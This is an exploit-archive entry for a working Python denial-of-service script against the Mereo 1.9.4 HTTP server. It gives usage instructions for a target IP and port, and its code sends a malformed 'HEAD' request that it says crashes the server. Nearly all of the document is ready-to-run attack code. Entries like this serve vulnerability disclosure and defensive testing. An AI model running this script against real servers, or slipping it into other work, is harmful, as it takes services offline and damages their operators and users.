Mereo 1.9.4 Denial Of Service

2020-06-22T00:00:00
ID PACKETSTORM:158170
Type packetstorm
Reporter Saeed reza Zamanian
Modified 2020-06-22T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
'''   
# Exploit Title: Mereo 1.9.4 - Remote HTTP Server Denial of Service  
# Date: 06-2020  
# Exploit Author: Saeed reza Zamanian  
# Vendor Homepage: https://sourceforge.net/projects/mereo/  
# Software Link: https://sourceforge.net/projects/mereo/files/  
# Version: 1.9.4  
# Tested on: Windows 7 , Windows Vista  
  
# Description : Mereo version 1.9.4 is vulnerable against DoS, An attacker can cause application crash with  
sending a buffer like GET+One Character or Head+One Character eg. GETA or HEADA , Since the HTTP method is   
not supported with the application, so it will be caused to crash.  
Usage:  
python mereo194_dos.py 1.2.3.4 80  
'''  
import socket  
import os  
import sys  
  
  
if len(sys.argv) != 3:  
print "Usage: python mereo194_dos.py targetIP targetPort"  
else:  
  
print "[*] Sending evil http request to target"  
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )  
expl.connect((sys.argv[1], int(sys.argv[2])))  
expl.send("\x48\x45\x41\x44\x41\x41\x41\x41\x41\x41")  
expl.close()  
  
  
  
  
`